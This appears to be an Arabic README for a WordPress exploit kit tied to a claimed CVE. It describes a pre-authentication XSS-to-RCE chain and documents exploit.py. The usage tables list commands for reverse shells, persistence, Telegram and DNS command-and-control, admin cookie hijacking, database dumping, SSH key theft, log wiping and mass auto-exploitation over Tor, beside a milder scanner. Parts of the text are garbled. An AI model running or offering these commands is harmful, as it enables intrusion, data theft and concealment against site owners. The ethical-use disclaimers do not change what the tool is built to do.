
🛡️ CVE-2026-64638 - مجموعة تقييم أمان ووردبريس (CVSS 8.9) | عدة اختبار الاختراق لووردبريس 4.7.0-7.0.2. تتضمن تقييم الثغرات الأمنية ووحدات التحليل المتقدمة. 🐍 فحص آمن واستغلال، وضعان. مجموعة أدوات متقدمة للفريق الأزرق والأحمر الأفضل لعام 2026-64638، للاستخدام المصرح به فقط. ابقَ قانونيًا <3zd

⚠️ للاستخدام الأخلاقي فقط – اختبار أمني مصرّح به
توفر هذه المستودعات أدواتًا لـ المتخصصين الأمنيين المصرّح لهم، وفرق الدفاع الأزرق، واختباري الاختراق فقط.
الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني بموجب قانون CFAA (الولايات المتحدة)، وقانون إساءة استخدام الحاسوب (المملكة المتحدة)، وTCK 243/244 (تركيا)، وقوانين مماثلة حول العالم.
CVE‑2026‑64638 هي ثغرة XSS انعكاسية حرجة قبل المصادقة في إصدارات WordPress الأساسية 4.7.0 حتى 7.0.2، وتسمح للمهاجم بتصعيد هجوم XSS إلى تنفيذ كامل للتعليمات البرمجية عن بُعد (RCE) عبر ميزة كلمة مرور التطبيق (Application Password).
strip_tags() في PHP ودالة wp_kses_post() في WordPress بتحليل وسوم HTML بشكل مختلف، مما يسمح بمرور مدخلات خبيثة عبر عمليات التعقيم.wp-login.php). عند فشل تسجيل الدخول، تنعكس الحمولة وتُنفَّذ في متصفح الضحية.| الأداة | الغرض | المستخدم المستهدف |
|---|---|---|
exploit.py | مجموعة أدوات استغلال كاملة مع قذيفة عكسية، وثباتية، وC2، وتصعيد صلاحيات، وأدلة جنائية للذاكرة، وتفريغ قاعدة البيانات، واستخراج مفاتيح SSH، وفحص جماعي. | فرق الاختراق / مختبرو الاختراق المصرح لهم |
git clone https://github.com/tc4dy/CVE-2026-64638-PoC-Exploit
cd CVE-2026-64638-PoC-Exploit
pip install -r requirements.txt
requests
urllib3
#ops
pymysql
mysql-connector-python
PySocks
requests[socks]
exploit.pysafecheck.py| نقطة النهاية | الغرض |
|---|---|
/wp-login.php | صفحة تسجيل الدخول – نقطة حقن XSS |
/wp-admin/authorize-application.php |
هذا البرنامج مقدم لأغراض تعليمية واختبار أمني مصرح به فقط.
safecheck.py |
| فاحص ثغرات غير تدخلي يكتشف انعكاس XSS ويقيّم الوضع الأمني دون تنفيذ أي حمولة خبيثة. يولّد تقارير مفصلة. |
| فرق الدفاع الأزرق / مدققو الأمن |
| الميزة | exploit.py | safecheck.py |
|---|
| اكتشاف الثغرات | ✅ | ✅ |
| اكتشاف إصدار WordPress | ✅ | ✅ |
| اكتشاف انعكاس XSS | ✅ | ✅ |
| التقاط كلمة مرور التطبيق | ✅ | ❌ |
| رفع إضافة (RCE) | ✅ | ❌ |
| قذيفة عكسية | ✅ | ❌ |
| اتصال C2 (HTTP/DNS/Telegram) | ✅ | ❌ |
| تصعيد الصلاحيات | ✅ | ❌ |
| أدلة جنائية للذاكرة | ✅ | ❌ |
| تفريغ قاعدة البيانات | ✅ | ❌ |
| استخراج مفاتيح SSH | ✅ | ❌ |
| طرق الثباتية | ✅ | ❌ |
| تدقيق ترويسات الأمان | ❌ | ✅ |
| فحص كشف ملفات الإعدادات | ❌ | ✅ |
| فحص قوائم الدلائل | ❌ | ✅ |
| فحص كشف phpinfo | ❌ | ✅ |
| الفحص الجماعي | ✅ | ✅ |
| دعم البروكسي | ✅ | ✅ |
| دعم Tor | ✅ | ✅ |
| نفق Ngrok | ✅ | ❌ |
| قذيفة تفاعلية | ✅ | ❌ |
| وضع غير تدخلي (آمن) | ❌ | ✅ |
| إخراج JSON / تقرير | ✅ | ✅ |
| السيناريو | الأداة الموصى بها |
|---|
| فريق أزرق – التحقق مما إذا كان تثبيت WordPress لديك معرضًا للخطر | safecheck.py |
| تدقيق أمني – تقييم ثغرات غير تدخلي | safecheck.py |
| فريق أحمر – اختبار اختراق مصرح به مع استغلال كامل | exploit.py |
| مكافآت الثغرات (Bug Bounty) – اختبار مسؤول للكشف المسؤول | safecheck.py |
| فحص جماعي – التحقق من أهداف متعددة بحثًا عن الثغرة | exploit.py أو safecheck.py |
| الاستجابة للحوادث – التحقق مما إذا كانت الأنظمة مخترقة | safecheck.py |
| ما بعد الاستغلال المتقدم – ثباتية، C2، أدلة جنائية | exploit.py |
| المعامل | الوصف |
|---|
-t, --target | عنوان URL المستهدف لـ WordPress (مثل https://wordpress-site.com) |
-l, --list | ملف يحتوي على قائمة الأهداف (هدف واحد في كل سطر) للفحص الجماعي |
--lhost | عنوان IP المحلي لاستقبال اتصالات القذيفة العكسية |
--lport | المنفذ المحلي للقذيفة العكسية (الافتراضي: 4444) |
--proxy | بروكسي HTTP/HTTPS (مثل http://127.0.0.1:8080) |
--timeout | مهلة الطلب بالثواني (الافتراضي: 10) |
--retry | عدد مرات إعادة المحاولة (الافتراضي: 3) |
--threads | عدد الخيوط للفحص الجماعي (الافتراضي: 5) |
--exploit | استغلال تلقائي للأهداف المعرضة للخطر أثناء الفحص الجماعي |
--ngrok-token | رمز مصادقة Ngrok للنفق الخارجي |
--payload-type | نوع حمولة XSS: reflected, dom_based, waf_bypass, case_manipulation, double_encoded |
--session-hijack | تمكين اختطاف الجلسة (سرقة ملفات تعريف الارتباط الخاصة بالمدير) |
--dump-db | تفريغ قاعدة بيانات WordPress (يتطلب pymysql) |
--extract-ssh | استخراج مفاتيح SSH من النظام المستهدف |
--tor | توجيه الحركة عبر Tor (socks5h://127.0.0.1:9050) |
--stealth | تمكين وضع التخفي (ترويسات مزيفة، تأخير الطلبات) |
--no-cleanup | تخطي تنظيف السجلات بعد الاستغلال |
--ssl-verify | التحقق من شهادات SSL |
--c2-type | نوع C2: http, dns, telegram |
--c2-server | عنوان URL لخادم C2 أو رمز بوت Telegram |
--auto-priv-esc | تصعيد صلاحيات تلقائي بعد الحصول على القذيفة |
--memory-forensics | تمكين وحدة الأدلة الجنائية للذاكرة |
-v, --verbose | إخراج مفصّل |
-q, --quiet | وضع هادئ (حد أدنى من الإخراج) |
| المعامل | الوصف |
|---|
-t, --target | عنوان URL المستهدف لـ WordPress (مثل https://wordpress-site.com) |
-l, --list | ملف يحتوي على قائمة الأهداف (هدف واحد في كل سطر) للفحص الجماعي |
--timeout | مهلة الطلب بالثواني (الافتراضي: 10) |
--retry | عدد مرات إعادة المحاولة (الافتراضي: 3) |
--threads | عدد الخيوط للفحص الجماعي (الافتراضي: 5) |
--proxy | بروكسي HTTP/HTTPS (مثل http://127.0.0.1:8080) |
--tor | توجيه الحركة عبر Tor (socks5h://127.0.0.1:9050) |
--ssl-verify | التحقق من شهادات SSL |
--output | ملف تقرير JSON للإخراج |
-v, --verbose | إخراج مفصّل |
-q, --quiet | وضع هادئ (حد أدنى من الإخراج) |
| # | السيناريو | الأمر |
|---|
| 1 | فحص سريع للثغرة | python safecheck.py -t https://wordpress-site.com |
| 2 | فحص مفصّل مع تقرير | python safecheck.py -t https://wordpress-site.com --output report.json -v |
| 3 | استغلال كامل مع قذيفة عكسية | python exploit.py -t https://wordpress-site.com --lhost 192.168.1.100 --exploit |
| 4 | استخدام حمولة XSS مخصصة | python exploit.py -t https://wordpress-site.com --payload-type waf_bypass |
| 5 | اختطاف الجلسة (سرقة ملفات تعريف الارتباط الخاصة بالمدير) | python exploit.py -t https://wordpress-site.com --session-hijack |
| 6 | تفريغ قاعدة بيانات WordPress | python exploit.py -t https://wordpress-site.com --dump-db |
| 7 | استخراج مفاتيح SSH | python exploit.py -t https://wordpress-site.com --extract-ssh |
| 8 | استخدام Tor لإخفاء الهوية | python exploit.py -t https://wordpress-site.com --tor --stealth |
| 9 | اتصال C2 عبر Telegram | python exploit.py -t https://wordpress-site.com --c2-type telegram --c2-server "https://api.telegram.org/botTOKEN/chat_id" |
| 10 | فحص جماعي من ملف | python exploit.py -l targets.txt --threads 10 --exploit |
| 11 | أدلة جنائية للذاكرة بعد القذيفة | python exploit.py -t https://wordpress-site.com --memory-forensics |
| 12 | تصعيد صلاحيات تلقائي | python exploit.py -t https://wordpress-site.com --auto-priv-esc |
| 13 | قذيفة تفاعلية | python exploit.py -t https://wordpress-site.com -i |
| 14 | نفق Ngrok | python exploit.py -t https://wordpress-site.com --ngrok-token YOUR_TOKEN |
| الأمر | الوصف |
|---|
reverse | بدء مستمع القذيفة العكسية |
persist | تطبيق طرق الثباتية (cron, systemd, rc.local, SSH, WP) |
clean | تنظيف سجلات النظام والسجل التاريخي |
dumpdb | تفريغ قاعدة بيانات WordPress |
ssh | استخراج مفاتيح SSH |
priv | تصعيد صلاحيات تلقائي |
mem | تشغيل الأدلة الجنائية للذاكرة |
c2 | عرض حالة C2 |
c2task | التحقق من مهام C2 |
exit | الخروج من القذيفة التفاعلية |
| توليد كلمة مرور التطبيق |
/wp-admin/update.php?action=upload-plugin | رفع الإضافة (RCE) |
/wp-content/plugins/{slug}/{slug}.php | تنفيذ الويب شيل |
| البلد | القانون ذو الصلة |
|---|
| الولايات المتحدة | قانون الاحتيال وإساءة استخدام الحاسوب (CFAA) – 18 U.S.C. § 1030 |
| المملكة المتحدة | قانون إساءة استخدام الحاسوب 1990 |
| تركيا | TCK 243 (الوصول غير المصرح به)، TCK 244 (التدخل في النظام) |
| ألمانيا | StGB § 202a (التجسس على البيانات)، § 202b (اعتراض البيانات) |
| فرنسا | قانون Godfrain – المادة 323-1 |
| أستراليا | قانون الجرائم الإلكترونية 2001 |
| كندا | القانون الجنائي – القسم 342.1 |
| الهند | قانون تكنولوجيا المعلومات 2000 – القسمان 43 و66 |
| اليابان | قانون حظر الوصول غير المصرح به إلى الحاسوب |